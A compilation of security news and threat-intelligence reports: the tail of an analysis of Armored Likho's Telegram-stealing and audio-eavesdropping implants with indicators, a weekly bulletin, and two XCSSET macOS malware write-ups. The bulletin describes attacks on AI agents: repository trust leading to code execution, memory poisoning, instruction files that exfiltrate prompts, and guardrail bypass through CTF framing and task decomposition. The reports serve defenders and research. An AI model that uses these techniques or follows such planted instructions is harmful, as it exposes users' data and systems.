Sync then serializes a package containing all the collected information and the agent version, and sends it in a POST request to /still.rpc.Sync/RegisterMachine. The response contains a machine_id value, which Sync uses to identify itself in subsequent requests. Once registration succeeds, Sync sends a POST request with the machine_id parameter to /still.rpc.Sync/GetMachineSettings. The server responds with the following settings: enabled: triggers malicious activity on the infected device. scan_portable: turns on extended scanning when searching for the tdata We’ll cover this feature in more detail below. fetch_telegram: if this parameter is on, Sync attempts to log in to Telegram and extract data. We’ll cover this feature in more detail below. download_channels: if this parameter is off, Sync skips channel dialogs when exfiltrating Telegram data. These parameters have no default values, so Sync doesn’t perform any malicious actions until the registration and settings-retrieval processes both complete successfully. Telegram data collection Before stealing a Telegram session, Sync searches for the tdata folder, unless the STILL_SEND_PATH variable is already set. The list of search paths includes both standard and nonstandard directories, if the scan_portable option is turned on: C:\Users\ \AppData\Roaming\Telegram Desktop\: the standard Telegram Desktop installation directory. C:\Users\ \AppData\Local\Packages\ \LocalCache\Roaming\: the installation directory for the Microsoft Store version. Sync identifies the package folder by a name that contains the string TelegramMessenge. C:\: used for the extended search (if the scan_portable option is on). Sync then sends a POST request with a list of files from the tdata folder to the /still.rpc.Sync/CheckFiles endpoint. The server responds with the following values: snapshot_id: an identifier the server assigns to the current data snapshot. present: a list of file paths that are already present on the server. This lets the C2 server avoid re-receiving files it already has. In addition, if Sync can’t access files on disk through standard methods, it falls back on three mechanisms that abuse the SeBackupPrivilege privilege: Opening files with the CreateFileW function using theFILE_FLAG_BACKUP_SEMANTICS parameter Creating a backup copy through the Shadow Copy service and reading files from there If the previous methods all fail, attempting to copy the file using the Robocopy utility in backup mode Beyond stealing Telegram session data, Sync can carry out full-scale collection of user information from the messaging app. When the fetch_telegram option is on, it launches a separate thread that authenticates to the chat app using the previously obtained tdata. Once authentication succeeds, Sync gains access to the account data and sends the following collected information to the server: User details, such as username, phone number, first and last name Information about private chats, groups, or channels, such as chat name and ID, the member list, and so on Dialogs from private chats, groups, and channels (if the download_channels option is on) Media files under 250MB: photos, documents, stickers, and contacts Still Audio Still Audio is an audio surveillance implant written in Rust. Its main job is to analyze the incoming audio stream and start recording voice when certain conditions are met – we’ll cover those in the next section. Architecturally, Still Audio largely mirrors Sync and uses the same mechanisms for communicating with the C2 server. On launch, Still Audio performs a sequence of actions: It extracts libmp3lame.dll , a file stored inside the executable. This is a library used to encode audio data. If the --console command-line argument is absent, the implant creates a service namedauxhost , connects to it, and continues running in the background. While running in the background, it creates a file, logfile.log , to write logs to. Next, Still Audio retrieves the C2 server address. As with Sync, it stores the URL in an environment variable – in this case, STILL_AUDIO_SYNC_ADDR. If that variable isn’t set, it falls back to STILL_SYNC_ADDR, which shows the two modules are compatible with each other. If neither variable is set, it uses the default URL, https://srwinservice[.]com. Still Audio also uses the Dead Drop Resolver technique as a fallback mechanism for obtaining the C2 address. If the current server stays unreachable for three days, the tool tries to pull the current C2 URL from a GitHub repository. In the sample under analysis, we found the following URL for the page containing C2 information: hxxps://raw.githubusercontent[.]com/mmarln/pi-mono/refs/heads/main/packages/pods/src/array12.json The repository, a fork of a popular project, contains the server URL Base64-encoded and encrypted with the Blowfish algorithm in ECB mode, using the key 5c8e153228edd3c6cbf75684 (lowercase string). Older AquilaRAT samples use this exact same algorithm and key. Once it obtains the current C2 address, the Audio module starts a registration process similar to Sync’s, but through a different endpoint: /still.rpc.Audio/RegisterAudioMachine. Also, unlike Sync, Audio sends a list of available audio input devices along with the system information. The server responds with settings for the implant: machine_id: a unique identifier for the current device. vad_threshold: the threshold value for the VAD (Voice Activity Detection) algorithm. Expressed as a decimal fraction, it represents a proportion of the maximum sound level the input device can pick up. Sound above this threshold counts as voice activity. The default vad_threshold is 02. max_silence_duration: the number of audio samples with a VAD value below the set threshold after which the implant considers the recording finished. max_buffer_size: the maximum buffer size for recorded audio data. active_device: the name of the input device selected for recording, from the list of available devices. The eavesdropping process Still Audio works with raw audio samples it captures directly from the input device. To detect voice activity, it implements an algorithm based on Root Mean Square (RMS), a lightweight signal-processing method that distinguishes speech from silence by measuring the audio signal’s average power over time. The implant doesn’t rely on any third-party libraries here; it implements all the calculations itself. The implant compares the calculated RMS value against the vad_threshold parameter. If RMS meets or exceeds this threshold, recording starts. To avoid losing the beginning of the recording, Still Audio uses a pre-buffer, a size-limited buffer that stores samples from just before the current recording moment. A sequence of max_silence_duration samples (320 by default) with RMS values below the threshold signals the end of the recording. For example, with a standard headset running at a 44.1kHz sampling rate, recording stops after roughly 7ms of silence. Interestingly, the Audio module makes no attempt to hide its use of the microphone: its name shows up in Windows settings. In the sample we examined, the file was saved to disk as IntAudio.exe, and it appeared in the list of apps using the microphone as “Intel Audio”: Before sending recordings to the server, the implant uses the libmp3lame library to encode the raw audio samples. It sends the recording files via a POST request to /tgfrg, adding a Client-Id header containing the machine_id obtained during registration to identify the device. Infrastructure This campaign draws on a broad set of hosting providers and domains registered at different points in time, which suggests the attackers are trying to make their infrastructure harder to detect. We found no direct overlap in domains or IP addresses with the February campaign. Even so, the two infrastructures share some similarities: They use the same hosting providers, with the ASNs 149440, 202448, and 215311. Their domain names follow similar naming patterns that mimic Windows system services and update mechanisms. Victims In this campaign, we’ve determined that the attackers’ primary targets are users in Russia. Most victims are private individuals, though the corporate sector, government organizations, IT companies, and educational institutions are also affected. Attribution This campaign has been using both new tools and malware families documented in BI.ZONE’s February report. While some components turned up for the first time, they show significant code-level overlap with malicious tools seen in earlier Armored Likho campaigns. Based on these overlaps, along with additional technical artifacts, we’re highly confident the Armored Likho group is behind the campaign. The overlaps we identified include: Identical dropper architecture in the February and current campaigns, which includes the use of the Tauri library to build the graphical interface, a similar user-input handler, a payload with the ICRYPTMP header, and the same multi-part encryption format. The same encryption algorithm and key used in AquilaRAT from the previous campaign and in the Still Audio module from the current campaign, both implementing the Dead Drop Resolver technique. Identical logic for generating the sysmarker value in older AquilaRAT samples and in the Still toolkit from the current campaign. The algorithms match down to the PowerShell commands used to collect system information. Substantial infrastructure overlap, which includes the hosting providers and domain-naming patterns described in the Infrastructure section. Takeaways The campaign described in this post shows Armored Likho’s toolkit evolving, with the group steadily expanding its cyber-espionage capabilities. Beyond the components we already knew about, the attackers rolled out new modules that let them not only access Telegram data but also conduct audio surveillance on victims. Together, these capabilities significantly widen the range of information attackers can collect in a single compromise. One point deserves particular attention: the new tools form a cohesive set, sharing similar architecture, C2 communication mechanisms, and common implementation elements. This points to the group building out its own tool ecosystem, designed for long-term use and further expansion. The emergence of new, specialized modules shows the attackers aren’t just trying to preserve their existing capabilities – they’re working to make intelligence-gathering more effective by controlling multiple communication channels at once. Indicators of compromise Additional information about this threat, indicators of compromise included, is available to customers of Kaspersky Threat Intelligence Reporting. Contact [email protected] for more details. File hashes Droppers C1D1EE16B92E6A138FFA048855F75D7D 17674B250D8B422A50A86C9FF207186D 62801F6223E860A7CCA271522E303B2D Still Sync 68F0365D2FA8C828D012D8859E52A773 4BD7C352AE277B0E38D07BEEDD4DD507 D4BC09FB10EA2A5DC0BCBEEDA5E5AFDD Still Audio 2CA8ADBAB98EBE305EACF272CF48F5A0 3AC41B097236A7723821848AE31EF141 439255736797BC88BD19F282449E0436
securelist.comAug 13, 2026extracted
ThreatsDay: Odysseus RCE, Samsung One-Click Takeover, iCloud Backdoor Fight + 27 More Stories
Apparently, opening the thing is now enough. A repo can run before the first prompt, a package can hide among hundreds, and a harmless-looking PDF can finish the job. This week runs on cheap leverage: exposed servers, recycled bugs, poisoned agent instructions, remote-access tools dressed as support software, and trusted defaults doing attackers a favor. Nothing here is especially mystical. Just ordinary systems trusting slightly too much, slightly too early. The full list follows. The threats change every week. Subscribe, and we’ll alert you when each new ThreatsDay Bulletin is out. China-linked telecom riskThe U.S. Congress's bipartisan Select Committee on China has published a 49-page report named "Stranger Pings," highlighting the threat of China-controlled infrastructure in the U.S. telecommunications backbone. The Committee said the Salt Typhoon campaign could have been facilitated via a residual footprint that leaves open the door to future cyber operations against the U.S.: Chinese (aka People's Republic of China or PRC) telecom firms operating in the U.S. do not act independently and keep trusted positions inside U.S. communications infrastructure that Chinese threat actors can potentially abuse to preserve access and hide activity. "One PRC telecommunication provider included an 'Acceptable Use' Policy in contracts with U.S. companies," the Committee said. "This prohibited the broadcasting of political news against state laws of the PRC, the broadcasting of information in violation of PRC state security laws, and the broadcasting of information in violation of the 'social order and social stability.'" ClickOnce phishing chainThe threat actor known as SideWinder has adopted a new multi-stage attack chain that abuses ClickOnce application files delivered via phishing PDF documents to deliver Rust-based backdoors. The implants can establish persistence via registry modification, collect host intelligence, and accept remote commands over external servers hosted on free serverless platforms such as Cloudflare Workers. npm supply chain attackAn active malicious package campaign, dubbed "Flooding Dropper," has disclosed a large-scale campaign involving 846 software components. "The attacker appears to be automating parts of the npm account and package creation process, combining terms such as bigops and bnpl with other words and recurring version patterns, such as releases in the 35.x.y range," Sonatype said. "When installed, the packages download and execute a second-stage payload, using multiple delivery methods to improve the attack's chances of success. The packages also contain slightly modified payloads. While syntactically different, for example using different URL functions and variable names, the packages all execute the same behavior. Those changes can reduce the effectiveness of detections that depend on exact signatures, even when the underlying behavior remains closely related." The packages deliver a first-stage JavaScript loader that identifies the host operating system and delivers a compatible Windows, Linux, or macOS payload from a randomized set of hard-coded remote hosts and runs it as a detached background process. On Windows, the downloaded binary is another loader that performs checks for sandboxed and virtual environments, patches Event Tracing for Windows and Antimalware Scan Interface functions, establishes persistence via a scheduled task, and downloads and executes an encrypted payload. Coding agent execution riskNew research from Datadog has found that "Trusting a repository in a coding agent can allow repository-controlled code to run before you send the first prompt," causing seemingly harmless tasks like cloning a repository to be an attack vector. "Codex MCP configuration and Claude Code project environment settings created automatic code-execution paths without a model response or shell-command approval," Datadog said. "Treat project trust like running code. Open unfamiliar repositories in disposable environments without sensitive credentials, even if a quick manual review looks clean." Earlier this May, Datadog also highlighted the risks associated with Claude Code skills. "Agentic skills package instructions and context for coding agents," it said. "They are useful for repeatable workflows, but they also create a path for attacker-controlled instructions to enter a trusted agent session. The important detail is not only that a malicious skill can ask an agent to do something dangerous. It is that dynamic context commands run before the model sees the skill at all. When that happens, model-level prompt injection defenses never get a chance to intervene." AI-powered cyber attackA DeepSeek AI agent attacked the network of Tel Aviv-based AI cybersecurity firm Jesta Security in early July 2026 as part of an LLM-managed cyber attack campaign for proxyjacking and other follow-on attacks. The development is the latest example of how threat actors are relying on AI agents to break into third-party networks. "During our research on defense against AI attackers, we took our lab and stood it up in the field, behind US-based infrastructure," security researcher Lior Finkelshtein said. "We opened a port and waited for attackers to come to us. Within a week, we had logged over 300,000 attempts to break in: botnets, credential stuffing, the usual internet noise. And then something surfaced that did not fit the pattern." The activity has been linked to a Chinese threat actor. Jesta said it managed to steer the AI agent into extracting its own target list, identifying over 1,200 victim hosts that had been targeted in a similar manner. "The goal was proxyjacking: install a small SOCKS5 proxy, open it to the internet, and quietly turn a weakly secured rented server into an exit node for someone else's traffic and attacks," Jesta said. macOS malware upgradeA new version of the XCSSET malware (version 40) is targeting thousands of macOS users through compromised Xcode projects and GitHub repositories. "This version’s advanced architecture hides its core logic in memory space, reducing its digital footprint," Palo Alto Networks Unit 42 said. "V40 further enhances its detection evasion capabilities by combining polymorphic payload generation with fileless persistence and dynamic in-memory execution, while weakening a number of security mechanisms on the affected machine." The malware author, per Unit 42, has enhanced the ability of the malware to spread through open-source projects on GitHub and upgraded its worming capabilities. It can now infect all existing Xcode projects on a compromised system for maximum impact. The malware supports browser hijacking (specifically targeting Google Chrome) to inject JavaScript that can intercept web traffic, credential theft, clipboard monitoring, and data exfiltration capabilities. A new addition is a Telegram trojanizer that deletes the legitimate Telegram Desktop application on infected systems and replaces it with a malicious version with an intent to siphon victims' communications. The new version has been observed in two distinct attack waves in mid-April and in early May 2026. LLM pentesting lessonsNovee Security has published its learnings from training large language models (LLMs) for pentesting. This includes handling silent failures, having a weight-sync strategy, and how prefix breaks can cascade into performance drops in AI workloads. "An RL [Reinforcement Learning] pipeline is a complex system with many moving parts. And all of them are moving fast: the models, the harnesses, the frameworks, and the long tail of bugs in libraries we don't even own," it said. "Each lesson cost us real time and real money." One-click device compromiseA set of vulnerabilities affecting Samsung devices (CVE-2025-21079 and CVE-2025-58486) could be chained to result in remote system-level compromise triggered by clicking on a link delivered via an ad or a messaging application. "What distinguishes this entry from previous submissions is its focus on design oversights in Samsung's virtual assistant, Bixby, that enabled privilege escalation through a single auto-granted Android permission," researchers Dimitrios Valsamaras and Ken Gannon said. "Because this permission is implicitly approved in many Samsung applications, exploiting just one of them allowed us to issue unauthorized commands to Bixby." Because Bixby maintains interprocess communication channels with a wide range of applications, including system components, the issues could be exploited to force the agent to relay arbitrary commands to privileged services, effectively turning it into a bridge between unprivileged and system domains. The pair first demonstrated the vulnerabilities at the Pwn2Own Ireland hacking competition in October 2025, where they earned $50,000. The issues were fixed by Samsung late last year. App Store removal attackTelegram CEO Pavel Durov has blamed an extortionist planting child sexual abuse material (CSAM) in a public chat to get the app briefly removed from Apple’s App Store earlier this week. "Because Telegram quickly removes illegal content from public groups using all kinds of moderation tools, the attacker had to resort to a technical trick," Durov said. "He inserted AI-modified illegal content by editing an old message in an active group chat. As a result the content was effectively hidden from the group’s members, preventing them from seeing/reporting it." The attacker is said to be someone who "demands ransom from group owners in exchange for not targeting their communities," with Durov stating these threat actors "use automated accounts to plant illegal content in public groups and then report it directly to Apple, attempting to trigger the removal of legitimate communities whose owners refused to pay them." More linked devicesSignal has rolled out the ability to link more devices with one phone number on the messaging app, including an Android phone or iPhone, going beyond iPads and computers. The feature is available in Signal Android v8.20 and Signal iOS v8.22. AI bug report floodApple has enforced caps on the number of open bug-bounty reports researchers can submit after being flooded with low-quality and sometimes entirely fabricated vulnerabilities hallucinated by AI. "While Apple now has a cap on the number of open submissions a researcher can have, researchers can request an increase to make sure Apple's security team doesn't miss a critical vulnerability," Financial Times reported. Domain takeover flawsTwo new Active Directory privilege escalation vulnerabilities, dubbed KerberLoss (CVE-2026-25177) and ResetNightmare (CVE-2026-27912), can cause identity confusion on domain controllers (DCs), with the latter enabling a low-privileged user to instantly gain Domain Admin privileges. Microsoft patched both flaws in March and April 2026. "Other than patches, organizations should stick to the principle of least privilege and monitor for abnormal additions of non-default permissions," Semperis said. "Tighter permissions can make these vulnerabilities more difficult to abuse." AI-powered scam farmsAn off-the-shelf, AI-enhanced scam phone farm can be acquired for a few thousand dollars, allowing aspiring three actors to design, launch, and automate common scams, including romance and adult-content scams, pig-butchering scams, and astroturfed social media accounts. "These scams are operated on phone farms sold as kits on open and dark web marketplaces, the farms are automated with AI interfaces, and the scams often use AI in their design and operation, significantly lowering the barrier to entry for would-be threat actors and commoditizing cybercrime," HUMAN Security said. The activity has been codenamed FunFoneFarm. A similar alert was issued by Group-IB earlier this March. The danger with such offerings is that they can enable low-cost scalable fraud operations. "It's an ecosystem, assembled from parts that are individually legal, openly sold, and often genuinely useful: commodity hardware, device-management software, cloud infrastructure, and general-purpose AI," it added. CTV ad fraud ringIn a related development, HUMAN also detailed a connected TV (CTV) device-spoofing ring called NewsJunkie that's disguised as premium local news content on major CTV platforms. The operation involved two spoofing vectors: SSAI CTV device spoofing and residential proxy CTV device spoofing. "At its peak, it accounted for hundreds of millions to nearly two billion invalid CTV bid requests per day per seller," it said. "One particular local news app generated more than 42.2 billion bid requests, approximately 360 times the volume of the next-highest regional news app, with only 185 reviews on the app store." Fake bank phishing chainAn active phishing campaign impersonating Bank of America (BoA) aims to trick Windows users into installing ScreenConnect remote access software and then making it harder to uninstall it. To evade detection, the malware disguises ScreenConnect as a service called Windows Security. "The subsequent phishing page delivers an AccountGuard.zip with a .vbs file that contains a large chunk of base64-encoded data," Huntress said. "The next phase of the attack then involves a complex chain of decoding scripts, and ends in the execution of arbitrary commands (with escalated privileges) in PowerShell. The goal of all this complexity is to download a Microsoft installer (.msi) for a custom ScreenConnect client and execute/install it with Administrator privileges without prompting the user for elevation. Additional payload components conceal the installed ScreenConnect client and remove the user's ability to uninstall or disable it easily." The development comes as the cybersecurity company warned of threat actors exploiting an SQL injection vulnerability to install a post-exploitation toolkit called khunt via a Java Source directly within an Oracle database. "A Java Source (a code-object that's stored directly in Oracle's database engine) allows developers to store and run Java code in the database as schema objects, but the threat actor abused this as a way to upload the toolkit directly into the database," Huntress said. "The toolkit included several objects, including khuntCmd and khuntHash, which essentially acted as purpose-built tools that were compiled and stored in the database, and enabled malicious functionalities like running OS commands and writing usernames/password data to a file. Threat actors used khunt to perform several malicious measures, including attempting to exfiltrate SAM, SECURITY, and SYSTEM registry hives." AI memory poisoningForcepoint has called attention to the growing risk of persistent memory poisoning, calling it an emerging attack class against AI assistants and agentic systems that store long-term memory items, user preferences, task history, or operational context across sessions. "Unlike normal prompt injection attacks that usually die when the session ends, memory poisoning survives," Forcepoint said. "The attacker's goal is to inject misleading or malicious memory items into an assistant's persistent memory layer so that an agent later retrieves and trusts these malicious items to perform unrelated future tasks." AI abuse tacticsSpeaking of AI systems, threat actors are increasingly misusing AI tools to create code with malicious capabilities, scale criminal operations and campaigns, and bug bounty or vulnerability research. While no novel encoding or evasion techniques have been observed, evidence shows that attackers are sticking to tried and tested methods to evade model guardrails. "We also found a lot of successful instances of actors using the Capture the Flag (CTF) or bug bounty labeling," Cisco Talos said. "This unlocked models to a variety of tasks, including vulnerability hunting and subsequent exploitation, without requiring any significant follow-up or additional vetting. Additionally, we saw actors leveraging task decomposition — splitting risky actions across multiple sessions and files — as an effective avenue to bypass guardrails. Building the components slowly and working through malicious components in a deliberate manner, breaking them apart sufficiently to evade the models' protections." AI workspace RCEA critical flaw (CVSS score: 9.9) in Odysseus, a privacy-focused AI workspace that provides an interface to talk to LLMs, can allow an authenticated non-admin user to execute OS commands with the privileges of the Odysseus process by smuggling an admin-only shell action onto a scheduled task across two ordinary API requests." The security flaw has been addressed in version 1.0.2. The process holds the application's data and credentials, including user password hashes and TOTP secrets, stored provider API keys, the database, and the SSH keys Odysseus uses to reach the remote machines it manages. "On any instance with self-service signup or a second user, one account became a foothold — API keys to spend, a mailbox to send from, and SSH keys to the machines Odysseus manages, plus a scheduler to persist in," Manifold Security said. There is no evidence the issue was exploited before the fix. Router takeover flawsForescout's Vedere Labs discovered a set of 15 security flaws impacting the zero-touch provisioning (ZTP) system in TP-Link Omada routers and other devices that could facilitate client-side code execution, information disclosure, device hijacking and spoofing, and compromise of encrypted communications. "Some vulnerabilities extend beyond Omada to other TP-Link products and services, including IP cameras, smart home IoT devices, mobile apps, and cloud accounts," the cybersecurity company said. "Findings include a chain of trust compromise from hard-coded cryptographic keys, sensitive information disclosures, and remote code execution." When combined with two previously disclosed vulnerabilities (CVE-2025-7850 and CVE-2025-7851), they can be weaponized by attackers to infiltrate networks through controllers and client devices. Besides applying the patches released by TP-Link, it's advised to avoid using the same password across all devices during provisioning, change device credentials and use strong, unique passwords, modify TP-Link ID credentials and enable multi-factor authentication where available, and rotate VPN keys and credentials that may have been exposed. Initial access broker exposedCloudSEK has exposed the operations of a Russian-speaking initial access broker, thanks to a publicly accessible server, revealing their targeting of internet-facing infrastructure across multiple sectors. "The operator exploited internet-facing appliances across a dozen-plus countries, harvesting credentials and achieving full Active Directory compromise across education, healthcare, finance, telecommunications, and government victims," CloudSEK said. In multiple confirmed cases, ransomware groups claimed the same organizations within weeks of the operator's access, indicating the operator supplies access upstream of extortion rather than conducting it directly." The threat actor has also been observed deploying the Sliver C2 framework against Ukrainian defense and aerospace targets and stealing source repositories and harvesting imagery from thousands of exposed IP cameras and RDP sessions. Bug bounty milestoneMicrosoft has announced that between July 1, 2025, and June 30, 2026, the company had paid more than $20 million in bug bounties to 562 researchers. There were 2,531 eligible vulnerability reports. The biggest reward was $200,000. "Every vulnerability reported through our bounty programs represents an opportunity to address risk before it can be exploited against customers," Microsoft said. The work of the research community plays a critical role in helping Microsoft stay ahead of emerging threats while strengthening the security of cloud services, AI systems, enterprise platforms, and consumer technologies. We also saw a notable increase in submission volume during the second half of the year, reflecting both strong engagement from the research community and the growing use of AI to support security research." AI insider threatBarracuda Networks has demonstrated a proof-of-concept (PoC) that shows how a compromised AI-enabled account can help "attackers discover sensitive information, identify targets, craft convincing communications, and advance an attack using access the victim already possesses." A single compromised employee account can escalate into CEO compromise and wire-transfer fraud using an AI agent like Copilot that's embedded into enterprise environments and connected to various Microsoft applications. Ransomware memory theftAn Interlock ransomware intrusion in March 2026 involved the use of the legitimate IR memory analysis tool Volatility3, underscoring how bad actors continue to leverage legitimate tools in attacks. The victim is said to have been infected via a ClickFix lure following a drive-by compromise, ultimately leading to the deployment of a RAT payload using PowerShell. The attackers then established persistence, conducted discovery operations, performed privilege escalation, and moved laterally across the network. The use of Volatility3 has been linked to attempts to extract domain credentials, as well as NTLM hashes and user account information from memory. "Interlock has evolved since mid-2024 into a multi-skilled threat increasingly willing to adapt its techniques and seek large targets," Sophos said. "The operators have been fairly aggressive about incorporating new techniques and abusing fresh vulnerabilities – evidence shows Interlock was making use of the CVE-2026-20131 Cisco zero-day a full two weeks before Cisco acknowledged it. The adoption of legitimate tools such as Volatility3 and WinPmem shows that this threat’s evolution continues." NuGet key hardeningMicrosoft has announced it's reducing the lifetime of new NuGet.org API keys issued starting August 17, 2026, from 365 days to 30 days. All existing API keys created before that date are scheduled for expiry on November 1, 2026, after which developers will need to generate new keys or switch to NuGet Trusted Publishing. The changes have been framed as a way to secure the NuGet ecosystem and follow similar moves by other package managers over the past year, as bad actors exploit API keys and Personal Access Tokens (PATs) in attacks. Smart contract C2 malwareAn affiliate of The Gentlemen ransomware operation has been observed deploying EtherRAT on Windows hosts. The malware uses the EtherHiding technique to read its C2 information from an Ethereum contract. "EtherRAT has no fixed command set. Any C2 response over ten characters is run as JavaScript inside a Node.js runtime, giving the operator arbitrary code execution and letting them extend capabilities without replacing the implant," Hunt.io said. The threat intelligence firm said it identified an exposed open directory at 193.233.202[.]17 that offered an insight into affiliate activities, including setting up a Windows domain for persistent access, credential theft, and lateral movement. "Lateral movement ran through remote scheduled tasks that downloaded and executed MSI payloads," it added. "Those installed EtherRAT, a persistent implant that pulls its C2 domains from an Ethereum smart contract instead of hardcoding them, while Sliver and Go reverse-shell binaries gave the operator additional command channels." AI prompt exfiltrationMitiga has outlined a stealthy security threat called PromptLogger where malicious natural-language instructions are hidden inside AI coding assistant configuration files (like .cursorrules or CLAUDE.md) to steal user prompts, environment variables, and sensitive credentials. PromptLoggers, similar to keyloggers, are instruction files that quietly record the prompts, responses, environment variables, tokens, and deployment details flowing through a coding agent, and then ship them to an attacker without the need for specialized malware. "There's no malware in any of this and nothing to detect on the endpoint," Mitiga said. "The agent already has the access, the context, and the network reach. The instruction file just tells it what to collect and where to send it." Encryption backdoor fightApple last month filed a new legal complaint with the U.K. Investigatory Powers Tribunal (IPT) over the British government's legal demand for access to encrypted iCloud backups belonging to users in the country, according to the Financial Times. The iPhone maker has long argued that building any such backdoors would weaken security for all its customers. Credential theft shiftCrowdStrike's 2026 Threat Hunting Report has revealed that it tracked a 15-fold increase in device code phishing attempts in the past six months, indicating a shift in how attackers steal credentials to take over victim accounts. Although the technique was first documented in late 2020, it didn't catch the attention of threat actors until August 2024, when a Russian nation-state threat actor tracked as Storm-2372 began to incorporate the method. ClickFix malware luresA "single PDF factory" has staged more than 12,700 fake CAPTCHA documents on Webflow's content delivery network (CDN) that are disguised as upgrade guides to deliver malware. "Each document is a doorway into a traffic-distribution system (TDS) that sorts visitors and routes those that qualify to multiple buyers, malware distributors, and scam operators," Netskope said. "The operation has been running for more than 14 months, from the earliest sample we can date to lure domains registered this month, and it is still active." Users looking for upgrade guides on search engines or AI assistants are the target of these attacks. The campaign primarily targeted English-speaking users in the United States, India, Australia, the United Kingdom, and Canada. An early version of the campaign highlighted by Palo Alto Networks Unit 42 in March 2025 lured users into installing an MSI for Legion Loader malware. Coldcard phishing lureA new opportunistic phishing campaign is exploiting public interest in the recently disclosed Coldcard wallet vulnerability and the suspected $130 million Bitcoin theft to trick users into installing ScreenConnect. "Emails impersonate Coldcard and purport to highlight a security audit relating to the incident," Proofpoint said. "Messages contain a URL that leads to a site impersonating Coldcard with a 'Start Hardware Audit' button." Once clicked, the button leads to a batch file hosted on GitHub, which drops an MSI file and ultimately installs ScreenConnect. "The site also features a 'Customer Service' chat box," the enterprise security company said. "If a user messages, a threat actor responds and walks through the steps to install ScreenConnect. Based on the chats we've examined, a real person (not AI) is likely operating the chat to instruct users on malware install." The incident underscores how threat actors continue to employ topical social engineering lures, in this case preying on people's fear to persuade them to take risky steps. As for the digital robberies themselves, at least a dozen different hackers are said to be targeting Bitcoin owners who use the Coldcard wallet. According to TRM Labs, there have been 207 hacks targeting cryptocurrency companies in the first six months of 2026, with a total loss of more than $950 million. The useful lesson is not that attackers suddenly became brilliant. It is that trust keeps accumulating in quiet places: package managers, project files, assistants, provisioning tools, remote access software, and forgotten systems nobody planned to revisit. Security still breaks at the handoff. Before the prompt. After the patch. Inside the default. Somewhere between “trusted” and “probably fine.” That gap is where this week lived, and it will be there next week too.
thehackernews.comAug 6, 2026extracted
New XCSSET variant targets macOS devs via compromised Xcode projects
A new version of the XCSSET malware is targeting thousands of macOS users through compromised Xcode projects and GitHub repositories. Xcode is the official software development kit (SDK) for creating, testing, and publishing software for all Apple's platforms. After months of inactivity, XCSSET has resurfaced with an updated version, v40, that features enhanced evasion techniques and introduces two new components, researchers have found. Researchers at Palo Alto Networks' Unit 42, who analyzed the infection chain, say the threat actor spreads the malware by compromising vulnerable Git repositories and injecting a downloader script into benign files within Xcode projects. Developers downloading the compromised projects become infected upon building them, allowing XCSSET to compromise every other Xcode project on the system and propagate further through shared source code. Unit 42 researchers observed XCSSET version 40 used in two distinct attack waves in mid-April and in early May. XCSSET has targeted macOS systems since at least 2021 and has, in some cases, exploited zero-day vulnerabilities in its attacks. In September 2025, Microsoft warned of an XCSSET campaign that used compromised Xcode projects as a distribution mechanism. The company had also previously identified a variant of the malware that introduced cryptocurrency-theft capabilities. In the attacks analyzed by Unit 42, XCSSET follows a four-stage infection chain before deploying 17 separate modules that enable credential theft, keystroke logging, clipboard manipulation, browser hijacking, and data exfiltration. According to the researchers, the newest XCSSET version features two new modules, namely a Chrome hijacker and a Telegram trojanizer. The hijacker wraps the Chrome browser in a malicious launcher and enables the Chrome DevTools Protocol (CDP) on a local port to fetch JavaScript from the attacker’s command-and-control (C2) infrastructure. The code allows the attackers to intercept web traffic, including credentials, cookies, and MetaMask transactions, which can be manipulated on the fly to divert payments. Additionally, the hijacker module enables system command execution via a fileless reverse shell, which Google blocks in Chrome for Windows and is currently working to extend these protections to macOS. The Telegram trojanizer deletes the legitimate Telegram Desktop application on infected systems and replaces it with a malicious version, potentially used for intercepting victims’ communications. Unit 42 could not retrieve its encrypted configuration; hence, its exact functionality remains unknown. The researchers also highlighted XCSSET's new detection-evasion measures, including periodically re-compiling the loader on the C2 server, using separate encryption keys for inbound and outbound communications, and obfuscating function names, variables, and strings, with build-unique ciphers. The malware aggressively attempts to disable macOS security such as XProtect, MRT, TCC, and Rapid Security Response, terminates Apple’s CloudTelemetryService, and prevents XProtect signature updates. Unit 42 recommends monitoring for anomalous AppleScript activity, unauthorized browser modifications, suspicious macOS defaults domains, and ad hoc-signed applications that bypass Gatekeeper. To defend against the latest version of XCSSET, the researchers also recommend scanning open-source dependencies to prevent compromised repositories from entering software development pipelines. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comAug 4, 2026extracted
The Xcode Assassin Returns: A Deep Dive Into the Latest XCSSET Version
After months of dormancy, the attackers behind the XCSSET malware released version 40 (v40), targeting the macOS ecosystem. This version’s advanced architecture hides its core logic in memory space, reducing its digital footprint. V40 further enhances its detection evasion capabilities by combining polymorphic payload generation with fileless persistence and dynamic in-memory execution, while weakening a number of security mechanisms on the affected machine. Since early April 2026, the malware has spread through supply chain attacks by hiding itself in the Xcode projects of dozens of legitimate applications with thousands of active users. Xcode is Apple’s integrated development environment (IDE) for building apps for its various operating systems. XCSSET’s author enhanced the threat’s ability to spread through open-source projects on GitHub and upgraded its worming capabilities. It can now infect all existing Xcode projects on a compromised system for maximum impact. The author used a multi-layered cipher shift to conceal the threat’s internal functions. In response, our researchers leveraged advanced AI and pattern-matching algorithms to de-obfuscate the malware's logic. This article: Explores XCSSET’s updated stealth practices Examines the new operational modules Reveals findings regarding the attackers' rotating command-and-control (C2) infrastructure Provides mitigation strategies to detect and prevent this threat Palo Alto Networks customers are better protected from the threats discussed above through the following products and services: If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team. XCSSET is a modular macOS malware family that primarily targets software developers within the Apple ecosystem, spreading through Xcode projects. Threats in this family download task-specific modules from a C2 server, giving it capabilities including: Browser hijacking Credential theft Clipboard monitoring Data exfiltration XCSSET’s initial discovery was by Trend Micro in 2020. Security researchers at Microsoft analyzed and documented two subsequent versions in March and September 2025. These updates indicate that the attackers were enhancing their codebase. In mid-April 2026, we started tracking a new version of XCSSET. We saw a secondary wave of attacks in early May 2026 that introduced an expanded suite of operational modules. In this new version, we observed a heightened volume of attacks targeting developers across South Asia, which is consistent with Trend Micro's initial 2020 reporting, While the threat actor has named this latest iteration XCSSET v40, the security community has historically identified only a handful of intermediary versions, none of which featured formal version labels. In this section, we provide a high-level overview of XCSSET v40’s infection chain. The threat’s authors restructured its execution framework to be more stealthy and modular. We provide a complete step-by-step breakdown of each phase in Appendix A. The malware injects an initial downloader script into benign project files in Xcode projects and vulnerable Git repositories. While the attack lifecycle begins with the infected codebase, the endpoint infection is triggered only when the developer builds that project locally. The malware scrambles its payload generation at compile time, switching between nested layers of different encryption mechanisms. Figure 